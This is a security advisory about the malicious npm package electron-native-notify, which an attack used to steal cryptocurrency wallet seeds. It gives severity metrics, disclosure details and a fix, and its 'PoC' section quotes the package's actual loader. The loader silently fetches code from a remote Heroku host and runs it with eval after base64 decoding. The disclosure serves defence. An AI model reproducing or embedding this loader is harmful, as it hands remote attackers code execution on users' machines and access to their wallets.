Malicious Package Affecting electron-native-notify package, versions >0.0.1-security
Snyk CVSS
Attack Complexity
Low
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Mature
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-ELECTRONNATIVENOTIFY-174928
- published 7 Jun 2019
- disclosed 5 Jun 2019
- credit Adam Baldwin
How to fix?
Avoid using electron-native-notify
altogether.
Overview
electron-native-notify is a malicious package.
This package contains malicious code and was part of a targeted attack to steal cryptocurrency wallet seeds and upload them to a remote server, effectively giving attackers access to users wallets.
PoC
try {
(process && "renderer" === process.type ? require("electron").remote.require : require)("https").get("https://updatecheck.herokuapp.com/check", res => res.on("data", d => {
try {
eval((atob || (e => "" + Buffer.from(e, "base64")))("" + d))
} catch (e) {}
}))
} catch (e) {}